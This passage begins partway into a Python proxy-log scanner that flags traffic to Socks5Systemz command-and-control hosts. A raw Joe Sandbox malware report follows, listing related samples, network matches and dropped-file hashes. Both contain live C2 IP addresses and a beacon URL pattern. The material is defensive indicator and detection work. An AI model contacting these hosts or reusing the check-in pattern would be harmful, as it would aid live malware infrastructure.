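# differs per run, so the detection keys on the path prefix, not the full URL.
C2_PATH_PREFIX = "/ai/?key="
# Microsoft CDN the sandbox excluded from analysis; never alert on it.
WHITELISTED_HOSTS = {"13.107.246.63", "s-part-0035.t-0009.t-msedge.net"}

# Constructed proxy log lines (not from the report) in the hypothetical format
# "<timestamp> <client-ip> <method> <url> <status>".
SAMPLE_LOG = """\
2024-12-18T12:50:01Z 10.0.0.21 GET https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72ee 200
2024-12-18T12:50:02Z 10.0.0.21 GET https://13.107.246.63/en-US 200
2024-12-18T12:50:05Z 10.0.0.34 GET https://www.easycutstudio.com/support.html 200
2024-12-18T12:50:07Z 10.0.0.21 GET https://188.119.66.185/779CB9834B480E8EE1B8DFF231005E9DC5D8267 404
2024-12-18T12:50:09Z 10.0.0.52 GET http://89.105.201.183/ 200
not a log line
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def classify_url(url):
    """Return a verdict for one URL: 'c2-beacon', 'c2-host', 'whitelisted' or None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host in WHITELISTED_HOSTS:
        return "whitelisted"
    if host not in C2_HOSTS:
        return None
    # urlsplit separates path and query; rebuild them to compare with the prefix.
    path_and_query = parts.path + ("?" + parts.query if parts.query else "")
    if path_and_query.startswith(C2_PATH_PREFIX):
        return "c2-beacon"   # check-in URL pattern seen in the report
    return "c2-host"         # any other request to known C2 infrastructure


def scan_log(log_text):
    """Parse proxy log lines and return the entries that hit C2 infrastructure."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip malformed lines rather than crash
        verdict = classify_url(m["url"])
        if verdict in ("c2-beacon", "c2-host"):
            hits.append({
                "ts": m["ts"],
                "client": m["client"],
                "host": urlsplit(m["url"]).hostname,
                "status": int(m["status"]),
                "verdict": verdict,
            })
    return hits


def clients_to_triage(hits):
    """Sorted list of internal hosts that talked to C2, beaconing clients first."""
    beaconing = {h["client"] for h in hits if h["verdict"] == "c2-beacon"}
    others = {h["client"] for h in hits} - beaconing
    return sorted(beaconing) + sorted(others)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['client']} -> {h['host']} [{h['verdict']}] HTTP {h['status']}")
    print("triage:", clients_to_triage(found))
```

Requests to a C2 address that do not match the check-in path are still reported (as "c2-host") because the report shows the same server answering paths like /779CB9834B480E8EE1B8DFF231005E9DC5D8267 and /en-US; an HTTP 404 from it, as the related-sample context below also records, is still contact with the infrastructure and should not be filtered out.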
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1577462
                                      Start date and time:2024-12-18 13:48:50 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 26s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:newwork.exe.1.exe
                                      Detection:MAL
                                      Classification:mal96.troj.evad.winEXE@5/26@0/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 91%
                                      • Number of executed functions: 191
                                      • Number of non-executed functions: 308
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: newwork.exe.1.exe
Time | Type | Description
07:50:22 | API Interceptor | 445480x Sleep call for process: mediacodecpack.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      188.119.66.185steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                        Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                            GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                              bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                  Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                    Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                      2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                        2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                          89.105.201.183OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 404
                                                          N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 200
                                                          cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 200
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          s-part-0035.t-0009.t-msedge.netIW9QNpidAN.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          IW9QNpidAN.exeGet hashmaliciousUnknownBrowse
                                                          • 13.107.246.63
                                                          cred.dllGet hashmaliciousAmadeyBrowse
                                                          • 13.107.246.63
                                                          v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 13.107.246.63
                                                          Setup2.exeGet hashmaliciousCryptbotBrowse
                                                          • 13.107.246.63
                                                          clcs.exeGet hashmaliciousCryptbotBrowse
                                                          • 13.107.246.63
                                                          2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                          • 13.107.246.63
                                                          stealc_default2.exeGet hashmaliciousStealc, VidarBrowse
                                                          • 13.107.246.63
                                                          F1TwARdSKB.jsGet hashmaliciousMint StealerBrowse
                                                          • 13.107.246.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FLYNETRU | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
NOVOSERVE-ASNL | Mg5bMQ2lWi.exe | malicious | Petite Virus, Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | wG1fFAzGfH.exe | malicious | Petite Virus, Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | getlab.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | file.exe | malicious | Nymaim, Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | i7j22nof2Q.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 89.105.201.183
NOVOSERVE-ASNL | file.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | file.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | file.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | gxjIKuKnu7.exe | malicious | Socks5Systemz | 89.105.201.183
Match | Associated Sample Name / URL | Detection | Threat Name | Context
51c64c77e60f3980eea90869b68c58a8 | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | cd#U9988.exe | malicious | Unknown | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | GEm3o8pION.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\MediaCodecPack\sqlite3.dll | steel.exe.3.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | AbC0LBkVhr.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | Oz2UhFBTHy.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | GEm3o8pION.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | GEm3o8pION.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | bzX2pV3Ybw.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | bzX2pV3Ybw.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | 2mtt3zE6Vh.exe | malicious | Socks5Systemz

Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3193465
Entropy (8bit): 6.245419881846555
Encrypted: false
SSDEEP: 49152:IG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:B1VWIkOISM89ra7Xq1WkW4rJ
MD5: 49FC2D4BA26F2EEF94CCC6B71EB0AD96
SHA1: BC2B35A763A9B6EF1CDB599FE1AD5933B528E9E0
SHA-256: FD66C66EF0DAD6BAA7DE9CFA8CD552D8D44DFB09531110EF3CE9D7B851BB5E0B
SHA-512: 73A58CB7F609F1BD049EEDDA9D295D07437E35D2D17ACC6C5D4A774710A50C134770031800033A943898E6848358DBC573168CBC199DF4848F46CDD7C5936BD3
Malicious: true
Yara Hits:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low

Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 645592
Entropy (8bit): 6.50414583238337
Encrypted: false
SSDEEP: 12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5: E477A96C8F2B18D6B5C27BDE49C990BF
SHA1: E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256: 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512: 335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: steel.exe.3.exe, Detection: malicious
• Filename: AbC0LBkVhr.exe, Detection: malicious
• Filename: Oz2UhFBTHy.exe, Detection: malicious
• Filename: GEm3o8pION.exe, Detection: malicious
• Filename: GEm3o8pION.exe, Detection: malicious
• Filename: bzX2pV3Ybw.exe, Detection: malicious
• Filename: bzX2pV3Ybw.exe, Detection: malicious
• Filename: Ni2ghr9eUJ.exe, Detection: malicious
• Filename: Ni2ghr9eUJ.exe, Detection: malicious
• Filename: 2mtt3zE6Vh.exe, Detection: malicious
Reputation: high, very likely benign file

Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
File Type: ISO-8859 text, with no line terminators
Category: dropped
Size (bytes): 8
Entropy (8bit): 2.0
Encrypted: false
SSDEEP: 3:b/ll:bX
MD5: 0546E4D8D6C1F214F5E91472146478CA
SHA1: 6FC5AA49DF55AC9CA8E4CA905B8718EDE4034319
SHA-256: 1B9799E865415E728102B34CE2A553D82CC32D601AB323BD76793A691F2998FC
SHA-512: 6023811D7BFDE7E329FA88639A112806FFDBFA2CD6FCE879958928A8890A84E0FB2D99AAE60B62F647DF525BA124E3CEA11580A0AC0B647BC6AC0FCCCC39B4CB
Malicious: false
Reputation: low
Preview: (.bg....

Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
File Type: data
Category: dropped
Size (bytes): 4
Entropy (8bit): 0.8112781244591328
Encrypted: false
SSDEEP: 3:U:U
MD5: 2B197A84C60EC779B10736BB6475B5E9
SHA1: C66F455EC1C14E38154F75BAF37ADD2E728EE0C1
SHA-256: 0623CCB9B1619BD388284A438034D8CB6431964BA727D8B1C450303105735488
SHA-512: 702414B61E87C6FFBB92A6B3B2E240639B6878560C62051FE641135A9352ED14A64CA844A641F5E330798E074DEEE8C52E0E721F16CCB37C000B3411CABD2060
Malicious: false
Reputation: low
Preview: ....

Process: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 128
Entropy (8bit): 2.9012093522336393
Encrypted: false
SSDEEP: 3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
MD5: 679DD163372163CD8FFC24E3C9E758B3
SHA1: F307C14CA65810C8D0238B89B49B2ACD7C5B233B
SHA-256: 510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
SHA-512: 46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
Malicious: false
Reputation: moderate, very likely benign file
Preview: 12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1645320
Entropy (8bit): 6.787752063353702
Encrypted: false
SSDEEP: 24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
MD5: 871C903A90C45CA08A9D42803916C3F7
SHA1: D962A12BC15BFB4C505BB63F603CA211588958DB
SHA-256: F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
SHA-512: 985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 348160
Entropy (8bit): 6.542655141037356
Encrypted: false
SSDEEP: 6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5: 86F1895AE8C5E8B17D99ECE768A70732
SHA1: D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256: 8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512: 3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: data
Category: dropped
Size (bytes): 3193465
Entropy (8bit): 6.245419443726979
Encrypted: false
SSDEEP: 49152:vG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:O1VWIkOISM89ra7Xq1WkW4rJ
MD5: E9385FAE29EC4352F30C9140C9844332
SHA1: 1BB2B802B8AD1324638E96199FF60648918BA8CB
SHA-256: 47F7DE0DD6E931B6D8200B4CF675082C77F01861784A3E3358F8A0657F4430BA
SHA-512: B3ADCF8AB4C658AC246772B151B7C2762A64BA40C00EF207493EC72CB15414DF08EC6774D4A1D064F00E93BCED9D174466C5B247E4795D81D27304C5924F80CA
Malicious: false
Yara Hits:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-D6CVE.tmp, Author: Joe Security

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 645592
Entropy (8bit): 6.50414583238337
Encrypted: false
SSDEEP: 12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5: E477A96C8F2B18D6B5C27BDE49C990BF
SHA1: E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256: 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512: 335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 176128
Entropy (8bit): 6.204917493416147
Encrypted: false
SSDEEP: 3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
MD5: FEC4FF0C2967A05543747E8D552CF9DF
SHA1: B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
SHA-256: 5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
SHA-512: 93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1645320
                                                                              Entropy (8bit):6.787752063353702
                                                                              Encrypted:false
                                                                              SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                              MD5:871C903A90C45CA08A9D42803916C3F7
                                                                              SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                              SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                              SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:MS Windows HtmlHelp Data
                                                                              Category:dropped
                                                                              Size (bytes):78183
                                                                              Entropy (8bit):7.692742945771669
                                                                              Encrypted:false
                                                                              SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                              MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                              SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                              SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                              SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):499712
                                                                              Entropy (8bit):6.414789978441117
                                                                              Encrypted:false
                                                                              SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                              MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                              SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                              SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                              SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:MS Windows HtmlHelp Data
                                                                              Category:dropped
                                                                              Size (bytes):78183
                                                                              Entropy (8bit):7.692742945771669
                                                                              Encrypted:false
                                                                              SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                              MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                              SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                              SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                              SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):176128
                                                                              Entropy (8bit):6.204917493416147
                                                                              Encrypted:false
                                                                              SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                              MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                              SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                              SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                              SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):3193465
                                                                              Entropy (8bit):6.245419881846555
                                                                              Encrypted:false
                                                                              SSDEEP:49152:IG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:B1VWIkOISM89ra7Xq1WkW4rJ
                                                                              MD5:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                              SHA1:BC2B35A763A9B6EF1CDB599FE1AD5933B528E9E0
                                                                              SHA-256:FD66C66EF0DAD6BAA7DE9CFA8CD552D8D44DFB09531110EF3CE9D7B851BB5E0B
                                                                              SHA-512:73A58CB7F609F1BD049EEDDA9D295D07437E35D2D17ACC6C5D4A774710A50C134770031800033A943898E6848358DBC573168CBC199DF4848F46CDD7C5936BD3
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):499712
                                                                              Entropy (8bit):6.414789978441117
                                                                              Encrypted:false
                                                                              SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                              MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                              SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                              SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                              SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):348160
                                                                              Entropy (8bit):6.542655141037356
                                                                              Encrypted:false
                                                                              SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                              MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                              SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                              SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                              SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):645592
                                                                              Entropy (8bit):6.50414583238337
                                                                              Encrypted:false
                                                                              SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                              MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                              SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                              SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                              SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                              Malicious:true
